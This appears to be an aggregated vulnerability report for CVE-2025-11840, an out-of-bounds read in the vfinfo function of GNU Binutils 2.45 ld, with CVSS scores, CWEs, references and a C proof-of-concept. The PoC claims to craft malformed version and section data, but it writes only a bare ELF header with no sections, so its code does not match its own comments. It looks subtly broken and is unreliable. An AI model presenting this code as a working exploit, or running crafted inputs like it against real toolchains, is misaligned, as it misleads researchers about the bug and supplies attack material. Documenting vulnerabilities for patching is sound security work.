Security Vulnerability Report
CVE-2025-11840 CVSS 3.3 LOW

Published: 2025-10-16 16:15:37
Last Modified: 2026-05-12 13:16:30

Description

A weakness has been identified in GNU Binutils 2.45. The affected element is the function vfinfo of the file ldmisc.c. Executing a manipulation can lead to out-of-bounds read. The attack can only be executed locally. The exploit has been made available to the public and could be used for attacks. This patch is called 16357. It is best practice to apply a patch to resolve this issue.

CVSS Details

CVSS Score: 3.3
Severity: LOW
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:gnu:binutils:2.45:*:*:*:*:*:*:* - VULNERABLE
GNU Binutils 2.45

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
/* CVE-2025-11840 - GNU Binutils 2.45 ldmisc.c vfinfo Out-of-Bounds Read PoC */
/* This PoC demonstrates triggering the OOB read in vfinfo function */
/* Compile with: gcc -o poc poc.c */
/* Usage: ld -o /dev/null crafted_object.o */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

/* Create a minimal ELF object file that triggers vfinfo OOB read */
/* The vulnerability is in ldmisc.c's vfinfo function, which formats */
/* the linker's diagnostic messages */
int main(int argc, char *argv[])
{
    /* Create a crafted ELF file with malformed version info sections */
    /* to trigger the out-of-bounds read in vfinfo */
    FILE *fp;
    unsigned char elf_header[] = {
        0x7f, 0x45, 0x4c, 0x46,                         /* ELF magic */
        0x02,                                           /* 64-bit */
        0x01,                                           /* Little endian */
        0x01,                                           /* ELF version */
        0x00,                                           /* OS/ABI */
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* Padding */
        0x02, 0x00,                                     /* ET_EXEC */
        0x3e, 0x00,                                     /* x86-64 */
        0x01, 0x00, 0x00, 0x00,                         /* ELF version */
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* Entry point */
        0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* Program header offset */
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* Section header offset */
        0x00, 0x00, 0x00, 0x00,                         /* Flags */
        0x40, 0x00,                                     /* ELF header size */
        0x00, 0x00,                                     /* Program header entry size */
        0x00, 0x00,                                     /* Number of program headers */
        0x00, 0x00,                                     /* Section header entry size */
        0x00, 0x00                                      /* Number of section headers */
    };

    fp = fopen("crafted_object.o", "wb");
    if (!fp) {
        perror("fopen");
        return 1;
    }

    /* Write malformed ELF header with corrupted section info */
    /* to trigger vfinfo OOB read during linking */
    fwrite(elf_header, 1, sizeof(elf_header), fp);
    fclose(fp);

    printf("Crafted object file created. Run: ld crafted_object.o\n");
    printf("Expected: OOB read in vfinfo() in ldmisc.c\n");
    return 0;
}

References

https://sourceware.org/bugzilla/attachment.cgi?id=16351 (Exploit)
https://sourceware.org/bugzilla/attachment.cgi?id=16357 (Not Applicable)
https://sourceware.org/bugzilla/show_bug.cgi?id=33455 (Exploit, Issue Tracking)
https://vuldb.com/?ctiid.328775 (Permissions Required, VDB Entry)
https://vuldb.com/?id.328775 (Third Party Advisory, VDB Entry)
https://vuldb.com/?submit.661281 (Third Party Advisory, VDB Entry)
https://www.gnu.org/ (Product)
https://cert-portal.siemens.com/produ ... (truncated)

Weaknesses

CWE-125 (Primary)
CWE-119, CWE-125 (Secondary)

Additional CVSS Metrics

CVSS 4.0 (Secondary): 1.9 LOW, CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
CVSS 3.1 (Secondary): 3.3 LOW, CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L
CVSS 3.1 (Primary): 5.5 MEDIUM, CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
CVSS 2.0 (Secondary): 1.7 LOW, AV:L/AC:L/Au:S/C:N/I:N/A:P